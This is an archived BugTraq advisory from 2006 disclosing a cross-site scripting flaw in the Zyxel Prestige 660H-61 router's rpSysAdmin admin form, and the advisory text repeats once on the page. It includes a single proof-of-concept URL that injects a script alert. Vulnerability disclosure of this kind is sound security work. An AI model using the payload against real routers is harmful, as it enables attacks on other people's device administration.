BugTraq
Back to list
|
Post reply
Zyxel Prestige 660H-61 Cross-Site Scripting
Jul 26 2006 04:31PM
jose palanco eazel es
Zyxel Prestige 660H-61 Cross-Site Scripting
Tested on Zyxel Prestige 660H-61
ZyNOS F/W Version: V3.40(PT.0)b32 | 1/28/2005
Standard:NORMAL
Discovered by: José Ramón Palanco: jose.palanco(at)eazel(dot).es
http://www.eazel.es
Description:
Zyxel Prestige 660H-61 ADSL Router is vulnerable to a security vulnerability that allow Cross-Site Scripting attacks.
Due to improper filtering, a remote attacker can cause a cross site scripting in this script:
http://router/Forms/rpSysAdmin?a=%3Cscript%3Ealert('www.eazel.es')%3C/sc
ript%3E
Original advisory:
http://www.eazel.es/media/advisory004-Zyxel-Prestige-660H-61-Cross-Site-
Scripting.html
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Tested on Zyxel Prestige 660H-61
ZyNOS F/W Version: V3.40(PT.0)b32 | 1/28/2005
Standard:NORMAL
Discovered by: José Ramón Palanco: jose.palanco(at)eazel(dot).es
http://www.eazel.es
Description:
Zyxel Prestige 660H-61 ADSL Router is vulnerable to a security vulnerability that allow Cross-Site Scripting attacks.
Due to improper filtering, a remote attacker can cause a cross site scripting in this script:
http://router/Forms/rpSysAdmin?a=%3Cscript%3Ealert('www.eazel.es')%3C/sc
ript%3E
Original advisory:
http://www.eazel.es/media/advisory004-Zyxel-Prestige-660H-61-Cross-Site-
Scripting.html
[ reply ]